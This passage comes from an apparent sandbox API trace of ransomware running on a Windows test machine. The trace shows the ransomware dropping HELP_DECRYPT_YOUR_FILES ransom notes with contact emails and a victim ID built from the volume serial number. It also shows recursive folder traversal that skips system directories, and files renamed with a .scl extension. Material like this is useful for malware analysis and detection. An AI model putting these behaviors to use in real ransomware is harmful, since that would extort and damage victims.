a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0201.742] WriteFile (in: hFile=0x388, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0201.745] CloseHandle (hObject=0x388) returned 1
	[0201.745] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.746] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.746] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0201.747] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.747] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0201.748] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0201.748] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.748] WriteFile (in: hFile=0x388, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0201.748] CloseHandle (hObject=0x388) returned 1
	[0201.748] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0x91bdbb53, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91c744e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0201.749] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*") returned 78
	[0201.749] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.749] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*", cchLength=0x4e | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*") returned 0x4e
	[0201.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.749] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="windows") returned 0x0
	[0201.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="boot") returned 0x0
	[0201.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="system volume information") returned 0x0
	[0201.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="temp") returned 0x0
	[0201.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="program files") returned 0x0
	[0201.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.752] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="appdata") returned 0x0
	[0201.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="application data") returned 0x0
	[0201.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="winnt") returned 0x0
	[0201.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="tmp") returned 0x0
	[0201.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="cache") returned 0x0
	[0201.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="webcache") returned 0x0
	[0201.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="inetcache") returned 0x0
	[0201.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="nvidia") returned 0x0
	[0201.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.755] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="packages") returned 0x0
	[0201.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.755] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="cookies") returned 0x0
	[0201.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.755] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\*.*", lpSrch="programdata") returned 0x0
	[0201.755] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0201.755] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0x91bdbb53, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91c744e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0201.756] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91aaa849, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91aaa849, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91ad0b6b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4590, dwReserved0=0x0, dwReserved1=0x0, cFileName="1nnjaiktbaoed3bu.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="1NNJAI~1.SCL")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91af6c7a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91af6c7a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91b1d04b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x123e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7v2v.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7V2VMP~1.SCL")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b8f5c9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91b8f5c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91b8f5c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xa1f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8b i.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="8BISWF~1.SCL")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bdbb53, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91bdbb53, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91bdbb53, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x81a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fvwv8r1sa5k.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FVWV8R~1.SCL")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c744e6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91c744e6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91c744e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c4e1e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91c4e1e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91c744e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0201.756] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c4e1e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91c4e1e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91c744e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0201.756] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0201.757] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4221e980, ftCreationTime.dwHighDateTime=0x1d973d4, ftLastAccessTime.dwLowDateTime=0x3b83c020, ftLastAccessTime.dwHighDateTime=0x1d9740c, ftLastWriteTime.dwLowDateTime=0x3b83c020, ftLastWriteTime.dwHighDateTime=0x1d9740c, nFileSizeHigh=0x0, nFileSizeLow=0xb93f, dwReserved0=0x0, dwReserved1=0x0, cFileName="a5PPAnDIWMmY.avi", cAlternateFileName="A5PPAN~1.AVI")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90987b25, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90987b25, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90987b25, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xb230, dwReserved0=0x0, dwReserved1=0x0, cFileName="bha7xl9pvfipksxlxcfg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="BHA7XL~1.SCL")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c5ca03, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90c5ca03, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c5ca03, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c36569, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90c36569, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c36569, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909adcf6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x909adcf6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x909adcf6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="ptvggb4.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PTVGGB~1.SCL")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bc3de8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90bc3de8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c36569, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4900, dwReserved0=0x0, dwReserved1=0x0, cFileName="ytsehq8ia1pz-.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YTSEHQ~1.SCL")) returned 1
	[0201.757] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bc3de8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90bc3de8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c36569, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4900, dwReserved0=0x0, dwReserved1=0x0, cFileName="ytsehq8ia1pz-.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YTSEHQ~1.SCL")) returned 0
	[0201.758] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0201.758] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0201.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9080a505, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9080a505, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90830528, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0201.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9080a505, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9080a505, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9080a505, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0201.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907e4062, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x907e4062, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x907e4062, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o5w4xg5 p4g tu.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="O5W4XG~1.SCL")) returned 1
	[0201.758] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pz4QOFg", cAlternateFileName="")) returned 1
	[0201.758] lstrcmpW (lpString1="pz4QOFg", lpString2="..") returned 1
	[0201.759] lstrcmpW (lpString1="pz4QOFg", lpString2=".") returned 1
	[0201.759] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ"
	[0201.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0201.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\", lpString2="pz4QOFg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg"
	[0201.759] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg"
	[0201.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\"
	[0201.759] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\"
	[0201.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*"
	[0201.759] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0201.760] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*") returned 61
	[0201.760] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.760] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*") returned 0x3d
	[0201.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.760] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="windows") returned 0x0
	[0201.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.761] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="boot") returned 0x0
	[0201.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.761] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="system volume information") returned 0x0
	[0201.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.761] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.761] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="temp") returned 0x0
	[0201.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.762] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="program files") returned 0x0
	[0201.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.762] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\*.*", lpSrch="program files (x86)") returned 0x0
